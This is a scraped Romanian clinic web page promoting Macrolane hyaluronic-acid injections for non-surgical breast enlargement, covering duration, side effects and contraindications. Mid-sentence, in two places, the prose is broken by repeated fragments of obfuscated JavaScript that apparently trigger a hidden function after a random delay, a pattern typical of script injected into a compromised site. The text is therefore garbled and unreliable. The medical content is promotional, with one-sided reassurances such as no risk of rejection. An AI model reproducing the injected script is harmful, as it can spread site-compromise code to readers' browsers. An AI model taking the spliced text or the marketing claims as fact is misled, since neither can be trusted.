surgery_body_en

Dr. Ovidiu Grecu

Despre operatii estetice

Operatiile estetice au menirea de-a imbunatati acele parti ale
corpului nostru care nu sunt dezvoltate perfect sau in
asimetrie cu restul caracteristicilor anatomice ale corpului.
bkgd31

Dr. Ovidiu Grecu

Proteze Mamare

Implanturile mamare sunt de diferite tipuri si forme,
cu diferite invelisuri si continuturi. Impreuna cu
chirurgul dumneavoastra veti alege tipul si forma protezei,
pentru a putea ajunge la rezultatul care-l doriti.

Macrolane

Dr. Ovidiu Grecu – Expertul tau in operatii estetice

Volumul sanilor poate fi augmentat si fara interventie chirurgicala, cu ajutorul lui Macrolane!
Pentru persoanele care doresc o marime in plus la sutien, Macrolane, este varianta cea mai potrivit

macrolane

Macrolane este o substanta pe baza de acid hialuronic cu o molecula mai mare. Structura moleculara fiind asemanatoare acidului hialuronic propriu corpului,  nu exista riscul de a fi rejectat de organismul dumneavoastra.
Cel mai frecvent se foloseste pentru marirea sanilor, a feselor sau a gambelor dar mai poate fi utilizat si pentru corectia unor cicatrici cu depresiuni, mici asimetrii sau iregularitati dupa lipoaspiratie, ingrosarea penisului, conturarea muschilor pectorali la barbati, etc. Toate aceste proceduri nu sunt interventii chirurgicale.

Daca va este teama sa va supuneti unei interventii chirurgicale sau nu doriti sa ramaneti cu cicatrici, injectarea de Macrolane va poate aduce un plus de volum care va va schimba masura sutienului cu cel mult o cupa. Nu este o marire de proportii dar schimbarea pe care o va aduce bustului dumneavoastra va fi evidenta.

Procedura nu necesita internare si se efectueaza sub anestezie locala.

Dupa injectare va puteti relua imediat activitatile obisnuite, fara restrictii.
Fata de marirea de sani cu implante de silicon, marirea prin injectare de Macrolane nu este definitiva.
Acidul hialuronic introdus va fi resorbit de organism in aproximativ 12 luni, necesitandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and reinjectarea pentru mentinerea rezultatului. Pentru reinjectare se folosesc de obicei cantitati mai mici de produs decat in faza initiala.
In cazul in care nu se doreste repetarea tratamentului, sanii revin la dimensiunile initiale, Macrolane-ul fiind degradat total intr-un interval de 18-24 luni.


Dupa injectare este posibila aparitia de mici echimoze (vanatai) si se constata o reactie inflamatorie usoara in jurul zonei injectate. La nevoie se poate administra tratament antialgic si antiinflamator.

Macrolane nu este indicat pentru:
•    persoane care sufera de boli autoimune, infectii HIV
•    tulburari de coagulare
•    infectii ale glandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andei mamare sau ale pielii sanilor
•    mastopatia fibrochistica

Suna Acum!
Navigheaza!